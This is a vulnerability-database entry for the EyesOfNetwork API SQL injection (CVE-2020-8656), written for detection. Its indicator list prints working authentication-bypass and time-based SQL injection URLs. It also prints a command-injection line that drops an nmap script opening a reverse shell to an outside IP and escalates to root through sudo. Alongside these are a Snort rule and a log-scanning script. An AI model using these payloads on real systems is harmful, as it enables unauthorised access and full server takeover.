cbcvebase.
CVE-2020-8656
published 2020-02-07


Priority: P190 critical · CVSS 3.1 base score: 9.8
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Flags: ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 84.60% (99.7th percentile)
An issue was discovered in EyesOfNetwork 5.3. The EyesOfNetwork API 2.4.2 is prone to SQL injection, allowing an unauthenticated attacker to perform various tasks such as authentication bypass via the username field to getApiKey in include/api_functions.php.

Affected (1 range)

Vendor          Product         Version range   Fixed in
eyesofnetwork   eyesofnetwork   -               -

Detection & IOCs (extracted from sources)

url: /eonapi/getApiKey?&username=%27%20union%20select%201,%27admin%27,%271c85d47ff80b5ff2a4dd577e8e5f8e9d%27,0,0,1,1,8%20or%20%27&password=h4knet
url: /eonapi/getApiKey?username=' union select sleep(3),0,0,0,0,0,0,0 or '
path: /eonapi/getApiKey
command: ' union select 1,'admin','1c85d47ff80b5ff2a4dd577e8e5f8e9d',0,0,1,1,8 or '
path: /eonapi/createEonUser
path: /tmp/h4k
command: ;echo "local os = require \"os\" hostrule=function(host) os.execute(\"/bin/sh -i >& /dev/tcp/192.168.30.112/8081 0>&1\") end action=function() end" > /tmp/h4k;sudo /usr/bin/nmap localhost -p 1337 -script /tmp/h4k #
snort rule:
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT EyesOfNetwork Generate API Key SQLi (CVE-2020-8656)"; flow:established,to_server; http.uri; content:"/eonapi/getApiKey"; fast_pattern; content:"username="; nocase; startswith; pcre:"/^[^&=]*(?:union|select)/Ri"; reference:url,www.exploit-db.com/exploits/48169; reference:cve,2020-8657; reference:cve,2020-8656; classtype:attempted-admin; sid:2034310; rev:1; metadata:attack_target Server, created_at 2021_11_01, cve CVE_2020_8656, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2021_11_01, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
  • Detect SQL injection auth bypass attempts against the EyesOfNetwork API by monitoring HTTP GET requests to /eonapi/getApiKey where the username parameter contains UNION SELECT keywords.
  • The exploit uses a distinctive hardcoded MD5 hash value '1c85d47ff80b5ff2a4dd577e8e5f8e9d' in the UNION SELECT payload as the injected password field; presence of this string in HTTP URI parameters is a high-confidence indicator of exploitation.
  • A time-based blind SQLi probe uses sleep() in the username parameter; monitor for HTTP 401 responses to /eonapi/getApiKey with anomalously long response times (>=6 seconds) as a detection signal.
  • The exploit chain follows a predictable sequence: SQLi on /eonapi/getApiKey → POST to /eonapi/createEonUser → POST to /lilac/autodiscovery.php with a command-injected target[] parameter. Correlating these three endpoints in sequence from the same source IP is a strong indicator of full exploitation.
  • The exploit uses a distinctive non-standard User-Agent string; alert on this UA in web server logs as an indicator of the public PoC tool being used.
  • The command injection payload in the AutoDiscovery target field is prefixed with a semicolon and suffixed with a space and hash (;CMD #) to break out of the target context; monitor POST bodies to /lilac/autodiscovery.php for target[] values matching this pattern.
  • Post-exploitation artifact: watch for creation of NSE script files in /tmp/ (e.g., /tmp/h4k) followed by execution of nmap with a -script flag pointing to /tmp/, indicating privilege escalation via the apache→root nmap sudo path.
  • The Nuclei template uses a stop-at-first-match strategy: it first tries the auth-bypass UNION SELECT request and only falls back to the time-based sleep probe if the first request does not return EONAPI_KEY. The time-based probe uses a 6-second sleep with a 20-second timeout; tuning these thresholds may be needed in high-latency environments.
  • The Metasploit module requires HTTPS (SSL: true) and defaults to port 443; running the module against HTTP-only targets will fail.
  • The module attempts API key generation via the hardcoded key first; only if that fails does it fall back to SQL injection. Detection rules should cover both the hardcoded-key path (CVE-2020-8657) and the SQLi path (CVE-2020-8656) to avoid blind spots.
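As an added illustration (not taken from the page's sources or from any tool cited above), a small Python triage script that applies the detection notes to web-server access logs: the getApiKey keyword and hardcoded-hash checks, the slow-401 time-based probe signal, and the three-endpoint chain correlated per source IP. The log format, field order and IP addresses are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Indicators taken from the detection notes on this page
HARDCODED_HASH = "1c85d47ff80b5ff2a4dd577e8e5f8e9d"
SQLI_RE = re.compile(r"\bunion\b|\bselect\b|sleep\s*\(", re.I)
CHAIN = ["/eonapi/getApiKey", "/eonapi/createEonUser", "/lilac/autodiscovery.php"]
# Constructed access-log lines (not real traffic): src method target status duration_ms
LOG = """\
10.0.0.5 GET /eonapi/getApiKey?username=admin&password=x 401 120
10.0.0.9 GET /eonapi/getApiKey?&username=%27%20union%20select%201,%27admin%27,%271c85d47ff80b5ff2a4dd577e8e5f8e9d%27,0,0,1,1,8%20or%20%27&password=h4knet 200 130
10.0.0.9 POST /eonapi/createEonUser 200 90
10.0.0.9 POST /lilac/autodiscovery.php 200 210
10.0.0.7 GET /eonapi/getApiKey?username=%27%20union%20select%20sleep(3),0,0,0,0,0,0,0%20or%20%27 401 6400
"""

def parse(line):
    """Split one constructed log line into a dict; parse_qs URL-decodes the query values."""
    src, method, target, status, ms = line.split()
    url = urlsplit(target)
    query = parse_qs(url.query, keep_blank_values=True)
    return {"src": src, "method": method, "path": url.path, "status": int(status),
            "ms": int(ms), "username": query.get("username", [""])[0]}

def classify(ev):
    # Per-request indicators, only meaningful for the getApiKey endpoint
    hits = []
    if ev["path"] != CHAIN[0]:
        return hits
    user = ev["username"]
    if HARDCODED_HASH in user:
        hits.append("hardcoded-hash")          # high-confidence public PoC payload
    if SQLI_RE.search(user):
        hits.append("sqli-keyword")            # same idea as the Snort pcre above
    if "sleep" in user.lower() and ev["status"] == 401 and ev["ms"] >= 6000:
        hits.append("time-based-probe")        # 401 that took >= 6 s: blind SQLi timing signal
    return hits

def scan(log):
    # Returns (src, indicator) alerts; "full-chain" fires when one IP hits all three endpoints in order
    alerts, stages = [], defaultdict(list)     # stages: src -> chain endpoints seen so far, in order
    for line in log.splitlines():
        ev = parse(line)
        alerts += [(ev["src"], h) for h in classify(ev)]
        seen = stages[ev["src"]]
        if len(seen) < len(CHAIN) and ev["path"] == CHAIN[len(seen)]:
            seen.append(ev["path"])
            if seen == CHAIN:
                alerts.append((ev["src"], "full-chain"))
    return alerts
```

Running scan(LOG) leaves the legitimate 10.0.0.5 login unflagged and reports the hash, keyword and chain indicators for 10.0.0.9 and the keyword plus timing indicator for 10.0.0.7.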

CVSS provenance

nvd v3.1: 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd v2.0: 7.5 HIGH AV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck: 9.8 CRITICAL